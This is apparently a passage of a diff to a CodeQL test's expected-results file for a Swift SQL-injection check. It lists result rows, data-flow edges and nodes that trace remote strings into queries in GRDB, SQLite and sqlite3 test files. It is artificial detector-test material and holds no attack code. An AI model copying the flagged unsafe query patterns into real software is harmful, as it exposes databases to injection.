user-provided value | -| GRDB.swift:212:47:212:47 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:212:47:212:47 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:224:37:224:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:224:37:224:37 | remoteString | This query depends on a $@. 
| GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:225:37:225:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:225:37:225:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:229:37:229:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:229:37:229:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:230:37:230:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:230:37:230:37 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:234:36:234:36 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:234:36:234:36 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:235:36:235:36 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:235:36:235:36 | remoteString | This query depends on a $@. | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:244:38:244:38 | remoteString | GRDB.swift:242:26:242:80 | call to String.init(contentsOf:) | GRDB.swift:244:38:244:38 | remoteString | This query depends on a $@. | GRDB.swift:242:26:242:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:252:32:252:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:252:32:252:32 | remoteString | This query depends on a $@. 
| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:253:32:253:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:253:32:253:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:254:32:254:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:254:32:254:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:255:32:255:32 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:255:32:255:32 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:261:29:261:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:261:29:261:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:262:29:262:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:262:29:262:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:263:29:263:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:263:29:263:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:264:29:264:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:264:29:264:29 | remoteString | This query depends on a $@. 
| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:270:29:270:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:270:29:270:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:271:29:271:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:271:29:271:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:272:29:272:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:272:29:272:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:273:29:273:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:273:29:273:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:279:29:279:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:279:29:279:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:280:29:280:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:280:29:280:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:281:29:281:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:281:29:281:29 | remoteString | This query depends on a $@. 
| GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:282:29:282:29 | remoteString | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | GRDB.swift:282:29:282:29 | remoteString | This query depends on a $@. | GRDB.swift:250:26:250:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:293:53:293:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:293:53:293:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:294:53:294:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:294:53:294:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:295:53:295:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:295:53:295:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:296:53:296:53 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:296:53:296:53 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:302:50:302:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:302:50:302:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:303:50:303:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:303:50:303:50 | remoteString | This query depends on a $@. 
| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:304:50:304:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:304:50:304:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:305:50:305:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:305:50:305:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:311:50:311:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:311:50:311:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:312:50:312:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:312:50:312:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:313:50:313:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:313:50:313:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:314:50:314:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:314:50:314:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:320:50:320:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:320:50:320:50 | remoteString | This query depends on a $@. 
| GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:321:50:321:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:321:50:321:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:322:50:322:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:322:50:322:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:323:50:323:50 | remoteString | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | GRDB.swift:323:50:323:50 | remoteString | This query depends on a $@. | GRDB.swift:291:26:291:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:334:57:334:57 | remoteString | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | GRDB.swift:334:57:334:57 | remoteString | This query depends on a $@. | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:335:57:335:57 | remoteString | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | GRDB.swift:335:57:335:57 | remoteString | This query depends on a $@. | GRDB.swift:332:26:332:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:344:51:344:51 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:344:51:344:51 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:345:51:345:51 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:345:51:345:51 | remoteString | This query depends on a $@. 
| GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:346:66:346:66 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:346:66:346:66 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:347:66:347:66 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:347:66:347:66 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:348:69:348:69 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:348:69:348:69 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:349:84:349:84 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:349:84:349:84 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:350:69:350:69 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:350:69:350:69 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:351:84:351:84 | remoteString | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:351:84:351:84 | remoteString | This query depends on a $@. | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:73:17:73:17 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:73:17:73:17 | unsafeQuery1 | This query depends on a $@. 
| SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:74:17:74:17 | unsafeQuery2 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:74:17:74:17 | unsafeQuery2 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:75:17:75:17 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:75:17:75:17 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:83:29:83:29 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:83:29:83:29 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:95:32:95:32 | remoteString | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:95:32:95:32 | remoteString | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:100:29:100:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:100:29:100:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:103:29:103:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:103:29:103:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:106:29:106:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:106:29:106:29 | unsafeQuery1 | This query depends on a $@. 
| SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:109:13:109:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:109:13:109:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:111:13:111:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:111:13:111:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:113:13:113:13 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:113:13:113:13 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:115:16:115:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:115:16:115:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:117:16:117:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:117:16:117:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:119:16:119:16 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:119:16:119:16 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:132:20:132:20 | remoteString | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:132:20:132:20 | remoteString | This query depends on a $@. 
| SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:50:22:50:22 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:50:22:50:22 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:52:14:52:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:52:14:52:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:53:14:53:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:53:14:53:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:54:14:54:43 | call to NSString.init(string:) | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:54:14:54:43 | call to NSString.init(string:) | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:55:14:55:14 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:55:14:55:14 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| other.swift:57:16:57:16 | remoteString | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:57:16:57:16 | remoteString | This query depends on a $@. | other.swift:46:25:46:79 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | This query depends on a $@. 
| sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:194:28:194:28 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:194:28:194:28 | buffer | This query depends on a $@. 
| sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:202:31:202:31 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:202:31:202:31 | buffer | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:210:31:210:31 | buffer | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:210:31:210:31 | buffer | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | edges | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:106:41:106:41 | remoteString | provenance | | | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:108:41:108:41 | remoteString | provenance | | 
@@ -366,3 +252,117 @@ nodes | sqlite3_c_api.swift:202:31:202:31 | buffer | semmle.label | buffer | | sqlite3_c_api.swift:210:31:210:31 | buffer | semmle.label | buffer | subpaths +#select +| GRDB.swift:106:41:106:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:106:41:106:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:108:41:108:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:108:41:108:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:111:43:111:43 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:111:43:111:43 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:114:51:114:51 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:114:51:114:51 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:117:27:117:27 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:117:27:117:27 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:119:27:119:27 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:119:27:119:27 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:122:41:122:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:122:41:122:41 | remoteString | This query depends on a $@. 
| GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:124:41:124:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:124:41:124:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:132:39:132:39 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:132:39:132:39 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:135:46:135:46 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:135:46:135:46 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:138:56:138:56 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:138:56:138:56 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:141:45:141:45 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:141:45:141:45 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:144:29:144:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:144:29:144:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:145:29:145:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:145:29:145:29 | remoteString | This query depends on a $@. 
| GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:146:29:146:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:146:29:146:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:147:29:147:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:147:29:147:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:148:29:148:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:148:29:148:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:149:29:149:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:149:29:149:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:150:29:150:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:150:29:150:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:151:29:151:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:151:29:151:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:166:32:166:32 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:166:32:166:32 | remoteString | This query depends on a $@. 
| GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:167:39:167:39 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:167:39:167:39 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:168:49:168:49 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:168:49:168:49 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:169:38:169:38 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:169:38:169:38 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:170:22:170:22 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:170:22:170:22 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:172:22:172:22 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:172:22:172:22 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:187:33:187:33 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:187:33:187:33 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:190:32:190:32 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:190:32:190:32 | remoteString | This query depends on a $@. 
| GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:193:37:193:37 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:193:37:193:37 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:201:36:201:36 | remoteString | GRDB.swift:199:26:199:80 | call to String.init(contentsOf:) | GRDB.swift:201:36:201:36 | remoteString | This query depends on a $@. | GRDB.swift:199:26:199:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:209:41:209:41 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:209:41:209:41 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:210:44:210:44 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:210:44:210:44 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:211:47:211:47 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:211:47:211:47 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:212:47:212:47 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:212:47:212:47 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | +| GRDB.swift:224:37:224:37 | remoteString | GRDB.swift:222:26:222:80 | call to String.init(contentsOf:) | GRDB.swift:224:37:224:37 | remoteString | This query depends on a $@. 
